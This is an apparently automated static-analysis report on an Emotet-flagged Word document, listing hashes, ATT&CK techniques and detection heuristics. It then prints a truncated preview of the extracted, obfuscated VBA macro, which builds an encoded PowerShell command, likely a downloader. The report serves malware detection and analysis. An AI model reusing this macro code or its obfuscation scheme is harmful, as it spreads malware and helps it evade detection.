Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ea4e8310d654028b…

MALICIOUS

Office (OLE)

97.8 KB Created: 2018-06-19 22:18:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 5afaf9c9581b06c351a609e12b6fb7b7 SHA-1: 7db6145f09e5d36bc63bdb8d45f48fd582c8d2f3 SHA-256: ea4e8310d654028bebcc2a94887ae40fda95227a6ff83da38d0827cf27eb3dd6
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with a signature indicating Emotet. Static analysis reveals the presence of a VBA macro with an AutoOpen function, which is a common Emotet delivery mechanism. The macro contains a Shell() call and attempts to construct and execute a PowerShell command, likely to download and run a secondary payload.

Heuristics 7

  • ClamAV: Doc.Malware.Emotet-6874849-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-6874849-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11557 bytes
SHA-256: 65f1e451374506ca9627bd4e612046139005d9e6254319f3281e78e0ad71a2d8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PDZSnjAlWarDk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dRThTYqLGaQT"
Function kUIjAdLmpA()
On Error Resume Next
GQJVVz = 74633
YvYUJc = CByte(vaimPU)
TjmSF = 87736
piWFV = CDate(raEHAv + Sin(33983 + 88957) * 29751 * CInt(74612))
BvONfD = CDate(25906)
PbccKT = NHONG
WiuPAo = "OwerSHell  [Str" + "iNG]::JOin(" + " '' ,(" + "'18C87Y124" + "!70"
DHDEzZ = 60773
ZjHjc = CByte(QclcfL)
crzQiS = 19551
RIwoVo = CDate(IXXdkn + Sin(99777 + 76294) * 52226 * CInt(13063))
sNadT = CDate(94154)
iaDHAq = iqLtca
YsSmWaXKvUz = "C67C64!1" + "19a22" + "C11G22r88C83r65" + "-2" + "7G8" + "9{84{92" + "Y83G85G66" + "-22r68Y87" + "r88{8"
DHENzu = 45889
EmUvo = CByte(kKIIO)
IQCmcF = 64675
CXtnXr = CDate(vDnrf + Sin(19811 + 65654) * 12395 * CInt(13514))
wSOvzw = CDate(15443)
isGHm = ZEWol
TjioQLQ = "2!89G91a13G18a6" + "5a7" + "0G125{122r66" + "C119C22r11C2" + "2{88r83Y65C" + "27z89W8"
jYwzpG = 40139
idQLH = CByte(SEBoPO)
NnLzcp = 90983
oticY = CDate(cGvHR + Sin(62092 + 76162) * 16933 * CInt(41678))
jBClC = CDate(90098)
YZlVzz = npTawW
waPOWDwvVWj = "4W92C" + "83W" + "85G66G22C" + "101{79G69a6" + "6r83!91W24Y12" + "0C83C66r24r97" + "{83-" + "84Y" + "117" + "G90!9"
muKLJu = 42983
aKOIiL = CByte(ZZrIu)
HArPld = 64183
pjjzk = CDate(qKmoqR + Sin(11332 + 84869) * 30362 * CInt(66246))
FnfkBt = CDate(58851)
PCWmY = jBzhGf
pLRpQtCtWO = "5G83Y88z" + "66{13z18r95" + "G97a103Y92{125" + "-98r22a" + "11C22" + "!17r94C" + "66{66C70{" + "12G25C25-" + "65"
kUIjAdLmpA = WiuPAo + YsSmWaXKvUz + TjioQLQ + waPOWDwvVWj + pLRpQtCtWO
End Function
Function jSzbDhZE()
On Error Resume Next
tYaOm = 5210
chNXz = CByte(mrIiR)
qjbWc = 5093
pZqHlB = CDate(VdvXl + Sin(66533 + 27033) * 47480 * CInt(35374))
AwkFjf = CDate(21204)
jhGVJ = hTijNI
JosWDu = "r65z65z2" + "4{9" + "5r66C91z85C9" + "0-" + "95!88" + "z95W85-" + "24C" + "68-67" + "z25z116r"
GlwQRN = 24007
fMmXS = CByte(AzELfq)
ZECHWV = 198
nJMlW = CDate(MzlpEw + Sin(44023 + 43152) * 77428 * CInt(42654))
nDUqM = CDate(20441)
pqjpmX = wMhTi
wrwFtahur = "84W" + "3C89Y25W11" + "8W94z66" + "r66-70G12a25-25" + "-65" + "G65z65a24C" + "87a85r85W89r67"
BqZDL = 28990
jTnwj = CByte(BWiPB)
wfoCzH = 81702
ztPzS = CDate(tnzHm + Sin(51546 + 15266) * 7032 * CInt(25182))
BoJutO = CDate(18436)
tUBCYi = rViwM
nmkwT = "Y88z66W95G88a" + "81z9" + "0a95W88r83-" + "24z95!88W80z"
njKfN = 43979
cafwb = CByte(AZNGr)
nzRTvi = 3245
DbwYIw = CDate(oFoqX + Sin(22148 + 21475) * 4406 * CInt(27806))
UYdkX = CDate(64754)
DAkavG = vHpWfK
jJAuzH = "89Y25" + "!123{" + "1{1" + "21{122r25!118{" + "94a66!66a70W1" + "2{25!25{65W"
BFcuk = 42492
fGRJij = CByte(zVHVW)
TwsSK = 72008
urHjt = CDate(wfwAVF + Sin(21924 + 53786) * 66703 * CInt(8457))
BHAJvs = CDate(7267)
bPPAv = aHYVu
wzuiulbA = "65W65W24{85" + "r83G88!66{" + "67G6" + "8{79z90W87{65W2"
KapzY = 33974
GzRSZ = CByte(voUcn)
kdwTnU = 82456
afBcm = CDate(qTtvm + Sin(31356 + 82930) * 67527 * CInt(47229))
wfhcV = CDate(23400)
aqFwW = iiQim
sJhos = "4r64Y79!6" + "7a82r67!2" + "4{66" + "Y83z85r94W25" + "!94{8" + "5a122" + "W91C67C2"
EWiRiE = 4331
iMwpaZ = CByte(lPQhR)
CiVmw = 29519
wSdWs = CDate(ADLoNR + Sin(12584 + 72763) * 92675 * CInt(8157))
XMIOD = CDate(67543)
wMKXMD = mYrhK
IXkbm = "5Y" + "118!9" + "4-66W" + "66a70a12-25" + "{25Y6Y3{5"
jSzbDhZE = JosWDu + wrwFtahur + nmkwT + jJAuzH + wzuiulbA + sJhos + IXkbm
End Function
Function worEFlZJ()
On Error Resume Next
aztYCa = 52295
QLObH = CByte(RqYskO)
JlpTV = 82968
ivUpjV = CDate(zTmUl + Sin(55292 + 39277) * 42249 * CInt(25817))
jToTt = CDate(79402)
FCuloz = LAcqdF
StBIwz = "z4Y82{88W87z" + "24" + "!85z89{91" + "z25Y71r110W92z" + "119z25a11" + "8r94z66!66" + "r70{12" + "G25r25r6" + "5W65{65" + "Y24{9"
umTRX = 73092
zmlNF = CByte(NquAu)
vJEMw = 97894
LAnAAW = CDate(LPaTQ + Sin(22257 + 40977) * 23774 * CInt(27648))
aijsQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.